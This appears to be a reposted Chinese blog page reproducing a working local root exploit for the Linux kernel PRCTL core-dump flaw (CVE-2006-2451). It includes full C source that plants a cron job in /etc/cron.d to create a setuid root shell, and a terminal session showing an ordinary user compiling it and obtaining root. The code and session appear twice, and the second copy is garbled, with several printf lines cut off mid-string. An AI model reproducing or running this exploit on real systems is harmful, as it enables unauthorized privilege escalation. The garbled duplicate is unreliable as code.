Linux Kernel PRCTL Core Dump Handling本地溢出代码
来源:互联网 发布:sql数据库置疑修复工具 编辑:程序博客网 时间:2024/05/01 00:22
有漏洞的内核:(Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4))
代码如下:
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="/nSHELL=/bin/sh/nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin/n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core/n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t/n");
printf("By: dreyer & RoMaNSoFt/n");
printf("[ 10.Jul.2006 ]/n/n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("Creating Cron entry/n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf(" Sleeping for aprox. one minute (** please wait **)/n");
sleep(62);
printf(" Running shell (remember to remove /tmp/sh when finished) .../n");
system("/tmp/sh -p");
}
实验过程如下:
[choatrue@localhost ~]$ uname -a
Linux localhost 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[choatrue@localhost ~]$ vi a.c
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="/nSHELL=/bin/sh/nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin/n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core/n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t/n");
printf("By: dreyer & RoMaNSoFt/n");
printf("[ 10.Jul.2006 ]/n/n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf(" Creating Cron entry/n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf(" Sleeping for aprox. one minute (** please wait **)/n");
sleep(62);
printf(" Running shell (remember to remove /tmp/sh when finished) .../n");
system("/tmp/sh -p");
}
"a.c" [新] 51L, 1684C 已写入
[choatrue@localhost ~]$ gcc -o a a.c
[choatrue@localhost ~]$ id
uid=501(choatrue) gid=501(choatrue) groups=501(choatrue) context=user_u:system_r:unconfined_t
[choatrue@localhost ~]$ ./a
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
Creating Cron entry
Sleeping for aprox. one minute (** please wait **)
Running shell (remember to remove /tmp/sh when finished) ...
sh-3.1# whoami
root
sh-3.1# id
uid=501(choatrue) gid=501(choatrue) euid=0(root) groups=501(choatrue) context=user_u:system_r:unconfined_t
sh-3.1#
HOHO,爽了吧。。。
代码如下:
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="/nSHELL=/bin/sh/nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin/n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core/n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t/n");
printf("By: dreyer & RoMaNSoFt/n");
printf("[ 10.Jul.2006 ]/n/n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("
sleep(62);
printf("
system("/tmp/sh -p");
}
实验过程如下:
[choatrue@localhost ~]$ uname -a
Linux localhost 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[choatrue@localhost ~]$ vi a.c
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="/nSHELL=/bin/sh/nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin/n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core/n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t/n");
printf("By: dreyer & RoMaNSoFt/n");
printf("[ 10.Jul.2006 ]/n/n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("
sleep(62);
printf("
system("/tmp/sh -p");
}
"a.c" [新] 51L, 1684C 已写入
[choatrue@localhost ~]$ gcc -o a a.c
[choatrue@localhost ~]$ id
uid=501(choatrue) gid=501(choatrue) groups=501(choatrue) context=user_u:system_r:unconfined_t
[choatrue@localhost ~]$ ./a
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
sh-3.1# whoami
root
sh-3.1# id
uid=501(choatrue) gid=501(choatrue) euid=0(root) groups=501(choatrue) context=user_u:system_r:unconfined_t
sh-3.1#
HOHO,爽了吧。。。
- Linux Kernel PRCTL Core Dump Handling本地溢出代码
- Linux core dump, core dump file
- LINUX core dump 详解
- linux core dump
- linux core dump
- linux core dump
- LINUX core dump详解
- Linux Core dump
- Linux Core Dump设置
- linux core dump
- Linux core dump详解
- Linux Core Dump
- linux core dump使用
- LINUX core dump详解
- 解析LINUX core dump
- Linux Core Dump
- Linux core dump
- Linux Core Dump
- 什么是Erlang
- 微软在盗版黑屏事件可能犯下极大的错误
- Linux系统信息查看命令大全
- JS正则表达式详解[收藏]
- linux command line reference
- Linux Kernel PRCTL Core Dump Handling本地溢出代码
- 绘制你的竞争定位图
- Erlang教程
- dataadapter 更新到数据库出库,请大侠指点下,谢谢
- 如何动态加载控件以及插件编程思想(C#)
- Head First C# 中文版 图文皆译 第二章 page49
- 使用接口的注意事项
- bcb中用数组给Excel的区域赋值
- 遭遇svchoct.exe,vonine.exe,HBKernel32.sys,ssdtti.sys,System.exe,ublhbztl.sys等2